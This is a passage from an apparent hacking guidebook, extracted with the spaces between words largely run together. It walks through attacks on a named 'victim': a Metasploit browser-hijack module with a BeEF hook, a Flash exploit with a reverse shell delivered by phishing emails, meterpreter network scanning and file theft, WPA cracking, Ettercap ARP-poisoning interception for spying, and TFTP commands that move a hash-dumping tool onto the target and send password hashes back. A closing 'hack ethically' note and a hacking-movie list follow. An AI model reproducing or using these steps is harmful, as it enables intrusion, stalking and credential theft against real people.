Tocontinue,youshouldputURIPATHtotherootdirectory.Typingthiswillhelpyoumsf>seturipath/

Andyourscreenshouldshowasimilarityto:

Msfauxiliary(android_stock_browser_uxss)>setREMOTE_JShttp://192.168.1.105/hook.js

REMOTE_JS=>http://192.168.1.105/hook.js

msfauxiliary(android_stock_browser_uxss)>setURIPATH/

URIPATH=>/

Msfauxiliary(android_stock_browser_uxss)>

Next,youshouldstarttheMetasploitserversousethesyntaxmsf>run

Afterenteringthesyntaxtoruntheserver,yourscreenmustshow:

Msfauxiliary(android_stock_browser_uxss)>run

[*]Auxiliarymoduleexecutioncompleted

[*]UsingURL:http://0.0.0.0:8080/

[*]LocalIP:http://192.168.1.107:8080/

[*]Serverstarted.

Msfauxiliary(android_stock_browser_uxss)>

ThenextstepistonavigatetothewebsitefromanAndroidbasedwebsitethatishostingthehookbecausethereisanautomaticallyprocessthathappen(injectingtheJavaScriptintoyourvictim’sbrowser)andyoushouldusethestorebrowseronanAndroidbaseddeviceandtakeawalkto192.168.1.107:8080oryoursite’sInternetProtocol.

The penultimate thing to do is to hanger the browser , you control the hackedsystem’sbrowserwhenthedeviceisvisitingyour192.168.1.107becausetheBeEFisgoingtohooktheirbrowserimmediately.

And finally, the last step is detecting if the browser is authenticated to FB, fordoing this please go to BeEF and search for Commands tab and beneath theNetwork folder you should find Detect Social Networks command, clicking onExecutebuttonwillseeifyourvictimisauthenticatedtoFB,TwitterorGmail.

BeEF shows as a result that this victim isnot authenticated toFBbut itwas toTwitter.Keepaneyeontheoperationtoseewhenthevictimisback,andwhenitwillopenFacebookyoucandirectatabtoopenhis/herpage.

Butwhatwouldyoudoifyouwouldbethehackedone?HerearesomeadvicestogetyourFacebookaccountbacktoyou:

Goimmediatelytohttps://www.facebook.com/hacked

AccessYourAccounthasbeencompromisedbutton

ProvidealltherequesteddataandpressSearch

Facebookwillrequestacurrentoroldpasswordsogivethemtheold

onebecausethehackermaybehaschangedit

SelectResetMyPassword

Changeyourprimaryemailaddress

Makesureyoutypeitright

Checkyouremailforapasswordresetlink

Followtheinstructionstheygiveyouandnormallyin23hoursyou

shoutgetyouraccountback.

Mythsaboutsocialengineeringexistedsincetheoldtimesandwillexistforever,theonlywaytobreakthemisbystudyingandtryingthem,thereisnoonethatcanproveyouamythbecausemythsareusuallystoriescreatedbylimitedmindsthatareextremelynegativeandtheyaretryingtoinfluencethepublicopinionandturnin 100% against bothwhite hat hackers and black hat hackers but this is not asolution.

Unfortunately, thepublicopinionisworkingontheprinciplebelieveanddonotresearch, this is themost inutileprincipleeverand that is themainreasonwhymostofthepeopleareunchallengeable.

Actually,negativityisanattentionmagnetbecausepeopletendtoreadmoreaboutnegativethingssuchasattacksandcrimesbutthemainproblemisthattheyarehighlypromoted,negativeaspectsaretotallyeclipsingthepositiveones.

This is happening in hacking world, only the passionate people and welldocumentedpeopleknowabouthacking, about thekindsofhackers andmaybemuch more than we expect but why are not white hat hackers promoted andhighlighted as the blackhat hackers?Because if theywere,most formsofmassmediawouldlosetonsofmoneyandattentionandinfact,thatiswhattheywant.

To use hacking in an educational way is not a cyber crime , hackers help thecompanies which run the world to make them do it even better but theysometimesstayintheshadowofthesecompaniesandnevershowup.Makesureyouarewelldocumentedaboutanytopicbeforeyoucreateanopinionaboutit…

If your curiosity is running out of the limits and youwould go to your victim’shouse,officeandeveryplacevisitedbyyourvictimjusttospyonthemyouwillnotresolvea lotof thingsbecauseyoumightgetcaughtbypoliceand there isabigrisk if your victim observes you and you will waste a lot of time investing insomeoneelse’spersoninplaceofinvestingtimeinyourperson,thereisanotherway to save the situation and invest time in your person by exercising yourhacking skills by spying on your victim’s online activity and maybe you findsomethinginterestingandhiddenaboutthatperson.Tobeginthemissionfollowthenextsteps:

Setyourexploitstrategy/planandstartbyrememberingthatAdobeFlashPlayeris the most vulnerable application and a hacker should take full advantage ofvulnerabilities.

Thenextstepisgettingyourvictim’semailaddress,youneedapersonatheadquarterstoclickonyourmaliciouslink/documentandbringdownawholenetworkofcomputers,andMaltegoisgoingtohelpyouatthispointbycollectingemailaddresses.

Next,sendthe‘’magicemail’’whichcontainsmaliciousfiletotheemailsyoujustfoundusingMaltego.Make yourmalicious code usingMetasploit and initiate aserverwiththemaliciouscode.Yourscreenmustshowasimilarcontenttowhatisbelow:

Msfexploit(adobe_flash_pixel_bender_b0f)>exploit

[*]Exploitrunningasbackgroundjob.

[*]Startedreversehandleron192.168.147.129:4444

[*]UsingURL:http://0.0.0.0:8080/JFr4gsilJM9IUoe

[*]LocalIP:http://192.168.147.129:8080/JFr4gsilJM9IUoe

[*]ServerStarted.

Msfexploit(adobe_flash_pixel_bender_bof)>

After you just set up a serverwith themalicious code, get back toMaltego andmakealistofwhatyoufoundusingitandstartsendingemailswiththelinktothetargetvictim(s).

As youmight know, time can resolve literally anything so take a seat and relaxbecauseyouhavedoneyourjob.Youhavesenttheemailsandinaperiodbetween24and48hoursthevictim(s)shouldclickyourlink.

Afteryou spent some timewaiting, someonehas just clickedyour linkandnowyouofficiallyhaveameterpretershellattachedtotheiroperatingsystem.

So, everything is going on respecting the initial plan and you have got onemachinethatisunderyourcontrolbutyouwanttoseetheotherdevicesonthatnetworksoyouwilldoanARPscanwhichmorethanscanning,isgivingyoutheInternetProtocoladdressofeverymachineonthatnetwork.Useasimilarsyntaxtothisone:

meterpreter>runarp_scan-r192.168.1.0/24inordertogetascreensimilartothisone:

meterpreter>runarp_scanner–r192.168.1.0/24

[*]ARPScanning192.168.1.0/24

[*]IP:192.168.1.101MAC00:0c:29:70:c7:2a

[*]IP:192.168.1.102MAC00:0c:29:18:6b:db

Meterpreter>

Greatnews!Asyoucansee,ARPisgivingyouMAC’saswellandmorethanthat,youareablenowtopivotallthesystemsonthatnetwork.

Thenextstepshouldsatisfyyourcuriositybecauseafterdoingalltheaboveyoushouldstartlookingwhatisgoingonaroundyou,gotothefirstsystemyouhackedandstartlookingforinterestingfiles,youarenowcapableofseeingtheentireharddrive,usethesearchcommandtodoitbetter!

Ifyouwanttogetmoredetails,pleasedownloadthefilethathasjustcaughtyourattentionfromthetargetsystem.Afteryouexplorethefirstmachine,donotforgetabouttheothersonthenetwork!

Youhave just realized thatyouarea spy lover?Great!Here is another trick foryou:

StartbyfiringupKaliandafterthatmakesureyouareonthesamenetworkwithyourvictimandyoucandoitinseveralways,itisdependingonthevictim.

If the victim is using a wireless network, be happy because it is not thatcomplicatedtocrackaWPApasswordoraWPSPIN,afterfindingoutthemagicword,logintoyourvictim’sAPtogetinthesamenetwork.

Ifyoucangetphysicalaccesstothevictimtakefulladvantageanddoit!

Andifyourvictimdoesnotmatchtheabove,hackthevictim’ssystemandthatistheultimatewaytogetonthesamenetwork.

Next,getreadytomakeaMitM(man-in-the-middle)attack,youcandoitusingEttercap.Inordertonotcomplicatethesituation,useGUIandtypethefollowingsyntaxkali>ettercap–G

Next,youshouldplaceyourselfbetweenthevictimand itsrouter, tostartdoingthis let Ettercap to breathe in on the network. Go to the menu and select theoptionUnifiedsniffing.

Choose the crossing point you want to sniff on ( if it is on wireless network itshouldbewlan0).

Move to thenext step by lettingEttercap scan for hosts, itwill provide you theInternetProtocoladdressandtheMACaddressfortheconnectedsystems.

Toseeallthehostsonthenetwork,gotoHostsmenuandselecttheoptionHostslist, youmust be able after that to see the Internet protocol addresses and theMACaddressesaswell.

Timetoattack!Remainatthesamepagealookatthetopofthescreen,youshouldfindthereaMitmmenu,choosefromthemenutheArppoisoningoptionandafterthat,pleaseselectyourtargetsystemsfromthelistmakethevictimbeTarget1andtherouterTarget2.

Now, you should be placed between the two targets, so you have successfullyreached your goal but there is still some work to do so, start using as a spyinstrument Snort, which was developed for malicious movements and it isworkingbypickingandinspectingeverypacketbutifyouarenotinterestedinseewhich malicious files are across the traffic you can see whatever you want bysimplytypingitinKali.

Snortisgivingyoutheoptiontosetyourrules,so,youcandisableruleswhicharenotinyourinterestzoneandactivaterulesaboutwhatyouexpecttoseeonyourvictim’ssoftware.

Continuejustbysettingrulesforwhatyouwantandenjoythespymission!

After you finish your spymission,make some time to learn another interestinghackingtrickwhichisusingTFTPtoinstallmaliciousfilesonyourtargetsystem,tryandlearnhowtodoitbyfollowingtheinstrunctionsbelow:

YoushouldknowthataTFTPisaprotocolwhichusesport69,youcanuseit inorder to upload or download files between systems and it does not requestauthentication. Installing a TFTP on a Kali Linux system allows you to uploadhackingsoftwareonyourtargetsystem.YourtargetshoulduseTFTPtoo.

Startby firingupKali andafter thatpleaseopena terminal, after youopen theterminalyoucanstarttheTFTPserverbyusingthesyntax:

kali>serviceatftpdstart

And then continue with creating a directory which you want to upload themaliciousfilefrombyusingthenextsyntax:

kali>mkdir/tftpboot

NextstepiseditingtheconfigurationfileforatftpdandinthiscasethetexteditorrecommendedisLeafpad,thenextsyntaxmighthelpyou:

kali>leafpad/etc/default/atftpd

Now,editthefileandsaveit.Restarttheservertoseewhatisgoingonwiththenewconfiguration.

Next,copyyourmaliciousfileto/tftpbootdirectoryandgotothedirectorywherethesoftwareisandthenuse ‘’cp’’commandtocopyit to/tftpbootdirectoryandyouaredonewiththisstep.

Getconnectedtothetargetsystemnowtouploadyourmaliciousfile,youcanuseacommandshelldeliveredbyNetcat.

Thenextinstructionismovingthemaliciousfile/softwaretoyourtargetafteryou

configureyourTFTPserver,thesyntaxusedshouldbesimilartothenextone:

C:\>tftp-iGET192.168.1.119samdump2

Andthelaststepinthishacktrickisdownloadingthehashesandsavetheminafileusingthefollowingsyntax:

C:/tftp-iPUT192.168.1.119hashes.txt

OnceyouhavethehashesyoucanusesoftwarelikeHashcatormaybeJohnTheRipperinordertohackthehashes.

CONCLUSION

Learning and trying all the hack techniques, methods, tips and tricks that arepresented inthisbookwillobviously improveyourhackingskillseven ifyoutryeachoneofthemonlyonce.Also,youcanusethehackmethods,tips,techniquesoreventrickstogetinspiredenoughtocreateanotheronesbecausethatiswhatinnovationmean.

Betweentyingthehackmethods,techniques,tipsandtrickspresentedacrossthebookyoucanrelaxbywatchingsomeinspirationalhackingmovieslike:

Hackers;JohnnyLeeMillerisayounghackerboythatiscaughtbyauthoritiesatonly11yearsoldforhackingthousandsofdevicesandhegetsasentencethatbanhimfromaccessingthecomputeruntiltheageof18.

Thefilmwasmadein1993butitrelatesascenariothatisgoingtohappenallthetime.

WarGames; the film was produced in 1993.Matthew Broderick is a teenagerwho loves tohackandhe isdoing fromhisbedroomusinghis laptop.With thehacks hemade he was gettingWorldWar III closer than ever because he getsaccesstotheDepartmentofDefense’snuclearmissilelaunchcontrols.

TheGirlwiththeDragonTattoo ;NoomiRapace is in themainrolewheresheisateenwomanwhojustgotoutoftheprisonbecauseshemadeacrimedueto loveandpassionreasons.Shewas traumatized in the jailandsheworksasahackerforpayandherjobmakeshermeetMikaelwhoisawriter.

Thenameofthemovieisverysuggestivebecauseitisperfectlydescribingherlifeexperienceandstory.

LivefreeorDieHard;thismovieispureart!

TimothyOlyphant is a hackerwho is takingdownUnited States infrastructureswhenhetriestohackforbigmoney.

Sneakers;RobertRedfordandBenaretwoyounghackerswhoplayandoneofthem is ending up in prisonwhile the other lives free. Theymeet after aroundthirty years and the onewhowas arrested isworking for ‘’ bad guys’’while theother is trying to find the truthabouthis job.TheNSAplays thebadguyswhowanttheencryptionalgorithmsothattheycanspyoneveryone.

GhostintheShell;awesomemovieaswell,itreflectsthefutureinJapanwherehumansarepart fleshandbloodandpartbionic.A lotof thepeopleowncyberbrainsandthisconceptisnotfarfrombeingrealityinthefuture.

Thelegendisaboutanextraordinaryoperationsmissionforcethatispart-policeand part-military. The front personality is a female officer whose body wasdestroyed as young girl and has been replaced by a gorgeous bionic body. Thehacking in this futuristic tale is the evenmoremalicious variety ofhacking, thehackingofthehumanmindandthehumanbodyingeneral.

The Fifth Estate; the name suggest an unauthorized hacking account ofWikiLeaksandJulianAssange.

Assange is a big famous hacker broke into the Pentagon, Citibank, NASA, andStanfordUniversity, among other facilities, before being caught.WikiLeakswasfoundedtoprovideasafepositionforwhistleblowerstomakeundergroundstateinformationobtainabletotheworldwhenthatinformationrevealstheilldeedsofinfluentialgovernments.TheywereguiltyfortheleaksaboutU.S.militaryabusesinIraqandAfghanistan,aswellasinotherspaces.

Althoughmodesthackingtakespositioninthisfilm,itisanimportantfilmforthehackingcommunityasitshowshowhackingcanchangetheworld’shistory,asitwillsurelydo.

TheItalianJob ; SethGreen turns intoLyle, ahacker capableofhighattackssuchasmanipulatingtrafficsignals.

Themoviedeservesawatchjusttoseethedevicesthatareinit!

HackEthically

Everythingyoumakeistotallycontrolledbyyou,soyouaretakingdecisionsandyouarechoosing theoptionsyouwant tobecauseyouare free todo it and it isyourright100%,infactthisisoneofthehumanfundamentalthreerights.

The book content is teaching you how to hack and it is presenting basicallyeverythingyoushouldknowabouthackinganditsimportancenowadays.Hackingshouldbeusedinordertoreachyoureducationalgoals.Everythingthathappensto you is a package of the results of your actions and you should assumeeverythingyoumake100%anddonotblameothersforyouractions.

Inlifeeverythingisaboutactionandreaction,themaingoalistoknowwheretostop.Youaretheonlypersonthatcanchangesomethinginyourlifeandyoucannotbeinfluencedbyothersbecausewhenyouconsiderthatyouareinfluencedbyothersyouareactuallynot,themainproblemisthelackofattitudeyoushowinfrontofyourpersonandthatiswhyyouthinkyouareinfluenced.

Nooneevershouldsupportanythingthatisnotbelongingtothem;everyoneofusisinfluencedbypersonaldecisions,personalattitudeandpersonallifestyle.

Even if you try to escape, in the end it is your decision, everything is movingaround you and you are the only person to decide in your case aboutwhat youshoulddoandaboutwhatyoushouldnotdo,youknowwhatisbetterforyou.

Goodluckinyourhackingendeavorsbutremembertohackethically!